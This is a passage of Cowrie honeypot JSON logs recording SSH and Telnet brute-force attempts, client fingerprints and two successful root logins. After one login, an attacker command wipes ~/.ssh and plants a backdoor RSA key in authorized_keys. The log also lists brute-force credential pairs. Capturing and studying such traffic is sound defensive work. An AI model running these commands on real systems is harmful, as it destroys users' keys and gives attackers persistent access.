{"eventid":"cowrie.session.closed","duration":"6.8","message":"Connection lost after 6.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:10:28.263726Z","src_ip":"212.227.235.229","session":"33aacacb80d5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":63358,"dst_ip":"1.2.3.4","dst_port":22,"session":"3762e0bf80a5","protocol":"ssh","message":"New connection: 212.227.235.229:63358 (1.2.3.4:22) [session: 3762e0bf80a5]","sensor":"my-vps","timestamp":"2025-08-26T14:10:40.938173Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-26T14:10:40.939161Z","src_ip":"212.227.235.229","session":"3762e0bf80a5"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-26T14:10:41.070841Z","src_ip":"212.227.235.229","session":"3762e0bf80a5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":32796,"dst_ip":"1.2.3.4","dst_port":22,"session":"eaf80bcb067c","protocol":"ssh","message":"New connection: 212.227.235.229:32796 (1.2.3.4:22) [session: eaf80bcb067c]","sensor":"my-vps","timestamp":"2025-08-26T14:10:41.374825Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T14:10:41.375534Z","src_ip":"212.227.235.229","session":"eaf80bcb067c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T14:10:41.622781Z","src_ip":"212.227.235.229","session":"eaf80bcb067c"}
{"eventid":"cowrie.login.failed","username":"rodolfo","password":"rodolfo","message":"login attempt [rodolfo/rodolfo] failed","sensor":"my-vps","timestamp":"2025-08-26T14:10:41.682573Z","src_ip":"212.227.235.229","session":"3762e0bf80a5"}
{"eventid":"cowrie.login.failed","username":"rodolfo","password":"rodolfo1","message":"login attempt [rodolfo/rodolfo1] failed","sensor":"my-vps","timestamp":"2025-08-26T14:10:42.816503Z","src_ip":"212.227.235.229","session":"3762e0bf80a5"}
{"eventid":"cowrie.login.failed","username":"usdc","password":"usdc","message":"login attempt [usdc/usdc] failed","sensor":"my-vps","timestamp":"2025-08-26T14:10:43.411086Z","src_ip":"212.227.235.229","session":"eaf80bcb067c"}
{"eventid":"cowrie.login.failed","username":"rodolfo","password":"rodolfo123","message":"login attempt [rodolfo/rodolfo123] failed","sensor":"my-vps","timestamp":"2025-08-26T14:10:43.949692Z","src_ip":"212.227.235.229","session":"3762e0bf80a5"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:10:44.660692Z","src_ip":"212.227.235.229","session":"eaf80bcb067c"}
{"eventid":"cowrie.login.failed","username":"rodolfo","password":"rodolfo1234","message":"login attempt [rodolfo/rodolfo1234] failed","sensor":"my-vps","timestamp":"2025-08-26T14:10:45.083669Z","src_ip":"212.227.235.229","session":"3762e0bf80a5"}
{"eventid":"cowrie.login.failed","username":"rodolfo","password":"rodolfo12345","message":"login attempt [rodolfo/rodolfo12345] failed","sensor":"my-vps","timestamp":"2025-08-26T14:10:46.217766Z","src_ip":"212.227.235.229","session":"3762e0bf80a5"}
{"eventid":"cowrie.session.closed","duration":"6.4","message":"Connection lost after 6.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:10:47.351786Z","src_ip":"212.227.235.229","session":"3762e0bf80a5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49352,"dst_ip":"1.2.3.4","dst_port":23,"session":"25c12fc768b7","protocol":"telnet","message":"New connection: 212.227.125.160:49352 (1.2.3.4:23) [session: 25c12fc768b7]","sensor":"my-vps","timestamp":"2025-08-26T14:11:16.026826Z"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-26T14:11:16.145830Z","src_ip":"212.227.125.160","session":"25c12fc768b7"}
{"eventid":"cowrie.login.failed","username":"","password":"","message":"login attempt [/] failed","sensor":"my-vps","timestamp":"2025-08-26T14:11:17.303065Z","src_ip":"212.227.125.160","session":"25c12fc768b7"}
{"eventid":"cowrie.session.closed","duration":2.3891191482543945,"message":"Connection lost after 2 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:11:18.415874Z","src_ip":"212.227.125.160","session":"25c12fc768b7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49368,"dst_ip":"1.2.3.4","dst_port":23,"session":"e41384dd5034","protocol":"telnet","message":"New connection: 212.227.125.160:49368 (1.2.3.4:23) [session: e41384dd5034]","sensor":"my-vps","timestamp":"2025-08-26T14:11:18.442963Z"}
{"eventid":"cowrie.session.closed","duration":1.3170311450958252,"message":"Connection lost after 1 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:11:19.759938Z","src_ip":"212.227.125.160","session":"e41384dd5034"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49376,"dst_ip":"1.2.3.4","dst_port":23,"session":"e60835e21fe3","protocol":"telnet","message":"New connection: 212.227.125.160:49376 (1.2.3.4:23) [session: e60835e21fe3]","sensor":"my-vps","timestamp":"2025-08-26T14:11:19.787160Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43890,"dst_ip":"1.2.3.4","dst_port":22,"session":"7398d33aa959","protocol":"ssh","message":"New connection: 212.227.125.160:43890 (1.2.3.4:22) [session: 7398d33aa959]","sensor":"my-vps","timestamp":"2025-08-26T14:11:20.096799Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T14:11:20.397879Z","src_ip":"212.227.125.160","session":"7398d33aa959"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T14:11:20.485776Z","src_ip":"212.227.125.160","session":"7398d33aa959"}
{"eventid":"cowrie.login.failed","username":"sync","password":"click1","message":"login attempt [sync/click1] failed","sensor":"my-vps","timestamp":"2025-08-26T14:11:21.472460Z","src_ip":"212.227.125.160","session":"7398d33aa959"}
{"eventid":"cowrie.session.closed","duration":1.7314672470092773,"message":"Connection lost after 1 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:11:21.518560Z","src_ip":"212.227.125.160","session":"e60835e21fe3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49378,"dst_ip":"1.2.3.4","dst_port":23,"session":"95c10eb60964","protocol":"telnet","message":"New connection: 212.227.125.160:49378 (1.2.3.4:23) [session: 95c10eb60964]","sensor":"my-vps","timestamp":"2025-08-26T14:11:21.545645Z"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin","message":"login attempt [admin/admin] failed","sensor":"my-vps","timestamp":"2025-08-26T14:11:21.646441Z","src_ip":"212.227.125.160","session":"95c10eb60964"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:11:22.749971Z","src_ip":"212.227.125.160","session":"7398d33aa959"}
{"eventid":"cowrie.login.failed","username":"","password":"","message":"login attempt [/] failed","sensor":"my-vps","timestamp":"2025-08-26T14:11:22.802863Z","src_ip":"212.227.125.160","session":"95c10eb60964"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41364,"dst_ip":"1.2.3.4","dst_port":22,"session":"5f323eb98214","protocol":"ssh","message":"New connection: 212.227.125.160:41364 (1.2.3.4:22) [session: 5f323eb98214]","sensor":"my-vps","timestamp":"2025-08-26T14:11:23.370388Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T14:11:23.415021Z","src_ip":"212.227.125.160","session":"5f323eb98214"}
{"eventid":"cowrie.session.closed","duration":2.4068517684936523,"message":"Connection lost after 2 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:11:23.952443Z","src_ip":"212.227.125.160","session":"95c10eb60964"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49388,"dst_ip":"1.2.3.4","dst_port":23,"session":"5a6e03e1d08e","protocol":"telnet","message":"New connection: 212.227.125.160:49388 (1.2.3.4:23) [session: 5a6e03e1d08e]","sensor":"my-vps","timestamp":"2025-08-26T14:11:23.979551Z"}
{"eventid":"cowrie.login.failed","username":"user","password":"user","message":"login attempt [user/user] failed","sensor":"my-vps","timestamp":"2025-08-26T14:11:24.101568Z","src_ip":"212.227.125.160","session":"5a6e03e1d08e"}
{"eventid":"cowrie.login.failed","username":"","password":"","message":"login attempt [/] failed","sensor":"my-vps","timestamp":"2025-08-26T14:11:25.223653Z","src_ip":"212.227.125.160","session":"5a6e03e1d08e"}
{"eventid":"cowrie.session.closed","duration":2.374156951904297,"message":"Connection lost after 2 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:11:26.353647Z","src_ip":"212.227.125.160","session":"5a6e03e1d08e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57672,"dst_ip":"1.2.3.4","dst_port":23,"session":"9fb82cf63c3f","protocol":"telnet","message":"New connection: 212.227.125.160:57672 (1.2.3.4:23) [session: 9fb82cf63c3f]","sensor":"my-vps","timestamp":"2025-08-26T14:11:26.455764Z"}
{"eventid":"cowrie.session.closed","duration":1.436598539352417,"message":"Connection lost after 1 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:11:27.892295Z","src_ip":"212.227.125.160","session":"9fb82cf63c3f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57684,"dst_ip":"1.2.3.4","dst_port":23,"session":"eeefea83d10b","protocol":"telnet","message":"New connection: 212.227.125.160:57684 (1.2.3.4:23) [session: eeefea83d10b]","sensor":"my-vps","timestamp":"2025-08-26T14:11:27.920594Z"}
{"eventid":"cowrie.login.failed","username":"telnet","password":"telnet","message":"login attempt [telnet/telnet] failed","sensor":"my-vps","timestamp":"2025-08-26T14:11:27.996903Z","src_ip":"212.227.125.160","session":"eeefea83d10b"}
{"eventid":"cowrie.login.failed","username":"","password":"","message":"login attempt [/] failed","sensor":"my-vps","timestamp":"2025-08-26T14:11:29.096755Z","src_ip":"212.227.125.160","session":"eeefea83d10b"}
{"eventid":"cowrie.session.closed","duration":2.3319852352142334,"message":"Connection lost after 2 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:11:30.252502Z","src_ip":"212.227.125.160","session":"eeefea83d10b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57700,"dst_ip":"1.2.3.4","dst_port":23,"session":"45169ddb491b","protocol":"telnet","message":"New connection: 212.227.125.160:57700 (1.2.3.4:23) [session: 45169ddb491b]","sensor":"my-vps","timestamp":"2025-08-26T14:11:30.280958Z"}
{"eventid":"cowrie.login.success","username":"root","password":"86981198","message":"login attempt [root/86981198] succeeded","sensor":"my-vps","timestamp":"2025-08-26T14:11:32.002236Z","src_ip":"212.227.125.160","session":"45169ddb491b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T14:11:32.063682Z","src_ip":"212.227.125.160","session":"45169ddb491b"}
{"eventid":"cowrie.command.input","input":"echo SCANNER_TEST","message":"CMD: echo SCANNER_TEST","sensor":"my-vps","timestamp":"2025-08-26T14:11:32.115874Z","src_ip":"212.227.125.160","session":"45169ddb491b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","size":492,"shasum":"f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","duplicate":true,"duration":"1.3","message":"Closing TTY Log: var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:11:33.409006Z","src_ip":"212.227.125.160","session":"45169ddb491b"}
{"eventid":"cowrie.session.closed","duration":3.1343069076538086,"message":"Connection lost after 3 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:11:33.414362Z","src_ip":"212.227.125.160","session":"45169ddb491b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37810,"dst_ip":"1.2.3.4","dst_port":22,"session":"0490177a6abb","protocol":"ssh","message":"New connection: 212.227.235.229:37810 (1.2.3.4:22) [session: 0490177a6abb]","sensor":"my-vps","timestamp":"2025-08-26T14:12:06.199309Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T14:12:06.203706Z","src_ip":"212.227.235.229","session":"0490177a6abb"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T14:12:06.662971Z","src_ip":"212.227.235.229","session":"0490177a6abb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56046,"dst_ip":"1.2.3.4","dst_port":22,"session":"0f15ac6415f4","protocol":"ssh","message":"New connection: 212.227.235.229:56046 (1.2.3.4:22) [session: 0f15ac6415f4]","sensor":"my-vps","timestamp":"2025-08-26T14:12:17.340388Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T14:12:17.341585Z","src_ip":"212.227.235.229","session":"0f15ac6415f4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T14:12:17.591280Z","src_ip":"212.227.235.229","session":"0f15ac6415f4"}
{"eventid":"cowrie.login.success","username":"root","password":"1qaz@WSX2023","message":"login attempt [root/1qaz@WSX2023] succeeded","sensor":"my-vps","timestamp":"2025-08-26T14:12:18.640984Z","src_ip":"212.227.235.229","session":"0f15ac6415f4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T14:12:19.166106Z","src_ip":"212.227.235.229","session":"0f15ac6415f4"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T14:12:19.167057Z","src_ip":"212.227.235.229","session":"0f15ac6415f4"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T14:12:19.168045Z","src_ip":"212.227.235.229","session":"0f15ac6415f4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T14:12:19.418229Z","src_ip":"212.227.235.229","session":"0f15ac6415f4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T14:12:20.028992Z","src_ip":"212.227.235.229","session":"0f15ac6415f4"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T14:12:20.029982Z","src_ip":"212.227.235.229","session":"0f15ac6415f4"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448